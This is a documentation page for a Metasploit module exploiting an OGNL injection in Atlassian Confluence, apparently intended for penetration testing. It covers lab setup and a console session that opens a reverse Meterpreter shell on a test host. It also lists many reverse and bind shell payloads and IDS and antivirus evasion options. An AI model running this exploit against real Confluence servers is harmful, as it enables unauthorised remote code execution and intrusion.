Atlassian Confluence Namespace OGNL Injection - Metasploit
This page contains detailed information about how to use the exploit/multi/http/atlassian_confluence_namespace_ognl_injection metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Atlassian Confluence Namespace OGNL Injection
Module: exploit/multi/http/atlassian_confluence_namespace_ognl_injection
Source code: modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
Disclosure date: 2022-06-02
Last modification time: 2022-06-06 22:03:21 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8090, 8443, 8880, 8888
List of CVEs: CVE-2021-26084, CVE-2022-26134
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
msf exploit(atlassian_confluence_namespace_ognl_injection) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.
Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information on affected and fixed versions, see CONFSERVER-79000.
Setup
- Create a new
docker-compose.yml
file with the contents below. - Startup the container using
docker-compose up
- Navigate to the HTTP service running on port 8090
- Acquire and provide an evaluation license
- When prompted, setup a standalone / non-clustered system
- Configure the database settings
- Select "By connection string", then Database URL:
jdbc:postgresql://postgresql:5432/confdb
- Username and password are both
confdb
- Select "By connection string", then Database URL:
- Setup takes a few minutes
- When prompted, select "Empty Site"
- Select "Manage users and groups within Confluence"
- Create an account, it will not be needed for exploitation
- Once setup has completed select "Start" and set a space name to something
Docker Compose File
version: '3'
services:
postgresql:
image: postgres:11
environment:
POSTGRES_DB: confdb
POSTGRES_USER: confdb
POSTGRES_PASSWORD: confdb
ports:
- '5432:5432'
confluence-server:
depends_on:
- postgresql
image: atlassian/confluence:7.13.0
ports:
- '8090:8090'
- '8091:8091'
Verification Steps
- Follow the steps from the Setup section to create a test instance
- Start msfconsole
- Run:
use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
- Set the
RHOSTS
,PAYLOAD
and payload-related options - Run the module
Scenarios
Confluence 7.13.0 in [Docker]
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
RHOSTS => 192.168.159.100
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (40132 bytes) to 192.168.159.100
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer : 5052c5eebf8a
OS : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the multi/http/atlassian_confluence_namespace_ognl_injection exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show info
Name: Atlassian Confluence Namespace OGNL Injection
Module: exploit/multi/http/atlassian_confluence_namespace_ognl_injection
Platform: Unix, Linux
Arch: cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-06-02
Provided by:
Unknown
bturner-r7
jbaines-r7
Spencer McIntyre
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://github.com/rapid7/metaspl
oit-framework/wiki/Using-Metasploit
RPORT 8090 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This mu
st be an address on the local machine or 0.0.0.0 to liste
n on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly gen
erated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits an OGNL injection in Atlassian Confluence
servers. A specially crafted URI can be used to evaluate an OGNL
expression resulting in OS command execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-26084
https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py
https://github.com/jbaines-r7/through_the_wire
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Module Options
This is a complete list of options available in the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show options
Module options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasp
loit-framework/wiki/Using-Metasploit
RPORT 8090 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This m
ust be an address on the local machine or 0.0.0.0 to lis
ten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly ge
nerated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.126 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
Advanced Options
Here is a complete list of advanced options supported by the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show advanced
Module advanced options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: au
to, bourne, debug_asm, debug_write,
echo, printf, vbs, vbs_adodb, certut
il, tftp, wget, curl, fetch, lwprequ
est, psh_invokewebrequest)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EXE::Custom no Use custom exe instead of automatica
lly generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of re
gular payload exe
EXE::FallBack false no Use the default template in case the
specified one is missing
EXE::Inject false no Set to preserve the original EXE fun
ction
EXE::OldMethod false no Set to use the substitution EXE gene
ration method.
EXE::Path no The directory in which to look for t
he executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding
payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
ListenerBindAddress no The specific IP address to bind to i
f different from SRVHOST
ListenerBindPort no The port to bind to if different fro
m SRVPORT
ListenerComm no The specific communication channel t
o use for this service
MSI::Custom no Use custom msi instead of automatica
lly generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of re
gular payload msi
MSI::Path no The directory in which to look for t
he msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (ele
vation to SYSTEM if accepted)
SSLCipher no String for SSL cipher spec - "DHE-RS
A-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked fo
r one
URIHOST no Host to use in URI (useful for tunne
ls)
URIPORT no Port to use in URI (useful for tunne
ls)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
Payload advanced options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session cr
eation.
AutoSystemInfo true yes Automatically capture system information on
initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and
unhook the process
AutoVerifySessionTimeo 30 no Timeout period to wait for session validati
ut on to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexad
ecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM fo
rmat, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTT
P header
HttpHostHeader no An optional value to use for the Host HTTP
header
HttpReferer no An optional value to use for the Referer HT
TP header
InitialAutoRunScript no An initial script to run on session creatio
n (before AutoRunScript)
MeterpreterDebugBuild false no Enable debugging for the Python meterpreter
MeterpreterDebugLoggin no The Meterpreter debug logging configuration
g , see https://github.com/rapid7/metasploit-
framework/wiki/Meterpreter-Debugging-Meterp
reter-Sessions
MeterpreterTryToFork true no Fork a new process if the functionality is
available
PayloadProcessCommandL no The displayed command line that will be use
ine d by the payload
PayloadUUIDName no A human-friendly name to reference this uni
que payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PU
ID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload
UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register ge
nerated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingback
s
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
SessionCommunicationTi 300 no The number of seconds of no activity before
meout this session should be killed
SessionExpirationTimeo 604800 no The number of seconds before this session s
ut hould be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on n
etwork failure
SessionRetryWait 10 no Number of seconds to wait between reconnect
attempts
StageEncoder no Encoder to use if EnableStageEncoding is se
t
StageEncoderSaveRegist no Additional registers to preserve in the sta
ers ged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected Sta
geEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/atlassian_confluence_namespace_ognl_injection module can exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show targets
Exploit targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/atlassian_confluence_namespace_ognl_injection exploit:
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
18 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
19 payload/cmd/unix/python/meterpreter/bind_tcp normal No Python Exec, Python Meterpreter, Python Bind TCP Stager
20 payload/cmd/unix/python/meterpreter/bind_tcp_uuid normal No Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
21 payload/cmd/unix/python/meterpreter/reverse_http normal No Python Exec, Python Meterpreter, Python Reverse HTTP Stager
22 payload/cmd/unix/python/meterpreter/reverse_https normal No Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
23 payload/cmd/unix/python/meterpreter/reverse_tcp normal No Python Exec, Python Meterpreter, Python Reverse TCP Stager
24 payload/cmd/unix/python/meterpreter/reverse_tcp_ssl normal No Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
25 payload/cmd/unix/python/meterpreter/reverse_tcp_uuid normal No Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
26 payload/cmd/unix/python/meterpreter_bind_tcp normal No Python Exec, Python Meterpreter Shell, Bind TCP Inline
27 payload/cmd/unix/python/meterpreter_reverse_http normal No Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
28 payload/cmd/unix/python/meterpreter_reverse_https normal No Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
29 payload/cmd/unix/python/meterpreter_reverse_tcp normal No Python Exec, Python Meterpreter Shell, Reverse TCP Inline
30 payload/cmd/unix/python/pingback_bind_tcp normal No Python Exec, Python Pingback, Bind TCP (via python)
31 payload/cmd/unix/python/pingback_reverse_tcp normal No Python Exec, Python Pingback, Reverse TCP (via python)
32 payload/cmd/unix/python/shell_bind_tcp normal No Python Exec, Command Shell, Bind TCP (via python)
33 payload/cmd/unix/python/shell_reverse_tcp normal No Python Exec, Command Shell, Reverse TCP (via python)
34 payload/cmd/unix/python/shell_reverse_tcp_ssl normal No Python Exec, Command Shell, Reverse TCP SSL (via python)
35 payload/cmd/unix/python/shell_reverse_udp normal No Python Exec, Command Shell, Reverse UDP (via python)
36 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
37 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
38 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
39 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
40 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
41 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
42 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
43 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
44 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
45 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
46 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
47 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
48 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
49 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
50 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
51 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
52 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
53 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
54 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
55 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
56 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
57 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
58 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
59 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
60 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
61 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
62 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
63 payload/generic/custom normal No Custom Payload
64 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
65 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
66 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/atlassian_confluence_namespace_ognl_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Tran
sfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via co
ntent encoding (Accepted: none, gzip, defla
te)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP header
s
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::server_name Apache yes Configures the Server header of all outgoin
g replies
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = di
sable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to test OGNL injection.
Here is a relevant code snippet related to the "Failed to test OGNL injection." error message:
82: res = inject_ognl('', header: header) # empty command works for testing, the header will be set
83:
84: return CheckCode::Unknown unless res
85:
86: unless res && res.headers.include?(header)
87: return CheckCode::Safe('Failed to test OGNL injection.')
88: end
89:
90: CheckCode::Vulnerable('Successfully tested OGNL injection.')
91: end
92:
Successfully tested OGNL injection.
Here is a relevant code snippet related to the "Successfully tested OGNL injection." error message:
85:
86: unless res && res.headers.include?(header)
87: return CheckCode::Safe('Failed to test OGNL injection.')
88: end
89:
90: CheckCode::Vulnerable('Successfully tested OGNL injection.')
91: end
92:
93: def get_confluence_version
94: return @confluence_version if @confluence_version
95:
Failed to execute command: <CMD>
Here is a relevant code snippet related to the "Failed to execute command: <CMD>" error message:
120: def execute_command(cmd, _opts = {})
121: header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
122: res = inject_ognl(cmd, header: header)
123:
124: unless res && res.headers.include?(header)
125: fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
126: end
127:
128: vprint_good("Successfully executed command: #{cmd}")
129: res.headers[header]
130: end
Go back to menu.
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- CVE-2021-26084
- https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
- https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py
- https://github.com/jbaines-r7/through_the_wire
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
See Also
Check also the following modules related to this module:
- exploit/multi/http/atlassian_confluence_webwork_ognl_injection
- exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce
- auxiliary/scanner/http/atlassian_crowd_fileaccess
- exploit/linux/http/atlassian_confluence_webwork_ognl_injection
- exploit/multi/http/confluence_widget_connector
- exploit/multi/http/struts2_namespace_ognl
- exploit/multi/http/apache_roller_ognl_injection
- exploit/multi/http/struts2_content_type_ognl
- exploit/multi/http/struts2_multi_eval_ognl
- exploit/multi/http/bassmaster_js_injection
- exploit/multi/http/cmsms_object_injection_rce
- exploit/multi/http/gitlist_arg_injection
- exploit/multi/http/log4shell_header_injection
- exploit/multi/http/php_cgi_arg_injection
- exploit/multi/http/phpmailer_arg_injection
- exploit/multi/http/playsms_template_injection
- exploit/multi/http/spring_cloud_function_spel_injection
- exploit/multi/browser/firefox_tostring_console_injection
- exploit/multi/browser/firefox_webidl_injection
- exploit/multi/fileformat/evince_cbt_cmd_injection
- exploit/multi/fileformat/js_unpacker_eval_injection
- exploit/multi/fileformat/peazip_command_injection
- exploit/linux/local/nested_namespace_idmap_limit_priv_esc
Authors
- Unknown
- bturner-r7
- jbaines-r7
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.